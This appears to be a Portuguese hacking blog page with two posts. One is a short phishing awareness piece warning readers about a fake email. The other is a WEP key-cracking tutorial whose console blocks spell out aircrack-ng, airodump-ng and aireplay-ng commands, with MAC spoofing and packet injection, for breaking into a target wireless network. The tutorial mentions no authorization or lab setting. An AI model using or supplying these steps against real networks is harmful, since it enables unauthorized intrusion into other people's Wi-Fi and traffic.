Hack's

Phishing Exemplo

Hoje recebi o Phishing de email mais real até hoje segue uma foto ….. prestem atenção pra não cair num golpe como esse ……

Screenshot from 2013-01-08 09:30:04

 

 

 

Phishing

 

 

 

 

 

 

Phishing Email

Um estelionatário envia e-mails falsos forjando a identidade de entidades populares consideradas confiáveis, tais como sites de entretenimento, bancos, empresas de cartão de crédito, lojas, órgãos governamentais etc. Geralmente, as mensagens são 

enviadas para milhões de endereços de e-mail que foram previamente coletados na Internet. A entrega dos e-mails, normalmente, é feita por computadores que estão sob o controle de pessoas mal intencionadas e incluem principalmente servidores de e-mail mal configurados e computadores com conexão banda larga infectados com cavalos de tróia propositadamente desenvolvidos para permitir o envio de e-mail em massa.

 

Standard
Hack's

Quebra de senha WEP

O WEP significa Wired Equivalent Privacy e foi desenvolvido usando o algorítimo RC4, produzido pela empresa RSA, mas foi empregado de forma  errada no WEP assim causando falhas no método de encriptação dos dados, fazendo que o mercado não adotasse esse protocolo como o padrão para segurança de redes wifi.
No WEP, os dois parâmetros que servem de entrada para o algoritmo RC4 são a chave secreta k de 40 bits ou 104 bits e um vector de inicialização de 24 bits. A partir desses dois parâmetros, o algoritmo gera uma seqüência criptografada RC4 (k,v).
Para quebrar uma senha wep você deve deve ter instalado o pacote aircrack-ng em sua maquina ou se preferir faça o download da distribuição Back|Track mais atual no site http://www.backtrack-linux.org/downloads/ que já virá instalada a ferramenta por padrão, siga os passos deste tutorial como estão dispostos a seguir para ter sucesso na quebra:
 
CONSOLE 1
root@fullmetal# airmon-ng
root@fullmetal# airmon-ng stop wlan0
root@fullmetal# ifconfig wlan0 down
root@fullmetal# macchange –mac 00:11:22:33:44:55 wlan0
root@fullmetal# airmon-ng start wlan0
root@fullmetal# airodump-ng wlan0
root@fullmetal# airodump-ng -c 11 -w wep123 –bssid (bssid) wlan0
(-c canal identificado no airodump da rede que vai ser atacada
 -w nome do arquivo a ser gerado na captura)
 
CONSOLE 2
root@fullmetal# aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
root@fullmetal# aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
 
CONSOLE 3
root@fullmetal# aircrack-ng -n 64 -b (bissd) wep123-01.cap
 
bssid = mac do AP
essid = nome da rede que você quer atingir
Standard